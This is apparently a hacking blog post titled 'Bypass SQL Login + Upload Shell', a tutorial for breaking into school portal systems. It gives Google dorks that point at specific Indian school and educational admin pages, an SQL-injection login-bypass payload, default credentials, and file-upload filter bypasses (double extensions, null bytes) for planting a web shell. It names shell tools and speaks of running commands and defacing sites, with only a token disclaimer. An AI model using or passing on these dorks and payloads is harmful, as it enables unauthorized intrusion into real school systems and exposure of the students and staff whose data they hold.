Bypass SQL Login + Upload Shell
Author: Nyx6st
Target Overview
For You
Many school portals built on RSPS (Remote School Portal Systems) expose vulnerable forms and admin pages. This article shows how to bypass SQL login, access the admin dashboard, and upload a shell for further exploitation.
Google Dork for Targeting
inurl:/admission-form-two.php intext:"Copyright 2019 - 2023 By Apex International School | Created By Crop Net Technology" intitle:"RSPS Login" inurl:admin inurl:admin/login.php site:.in
Additional dorks to filter by educational domains:
filetype:php inurl:admin site:.edu.in inurl:dashboard
Example Login Exploit
Username: ' or 1=1 limit 1 -- -+ Password: ' or 1=1 limit 1 -- -+
Or try default credentials if available:
Username: admin Password: admin
Confirming Login Success
If successful, the server redirects to an admin dashboard such as:
/dashboard.php /admin/home.php /index.php?user=admin /admin/upload_file.php
HOLD!
Shell Upload (Post-Login)
Step-by-step:
- Find an upload page (upload.php, file_upload.php, etc).
- Test uploading files with common extensions (.jpg, .png).
- Try bypassing filters with double extensions or null byte tricks:
shell.php.jpg shell.php;.jpg shell.php%00.jpg
- Use tools like Burp Suite or Tamper Data to bypass client-side restrictions.
- Locate uploaded shell URL:
https://target.com/uploads/shell.php https://target.com/assets/images/uploads/shell.php
Access the shell to run commands, upload more files, or deface the site.
Live Target Examples
Disclaimer: Use only in authorized environments or with explicit permission.
Recommended Shell/helper
- respawn uploader
- bypass shell
- mini shell
- 6ickShell Manager
- Clone
Tools Admin Breaker
"Where creativity, exploitation, and expression collide."
Posting Komentar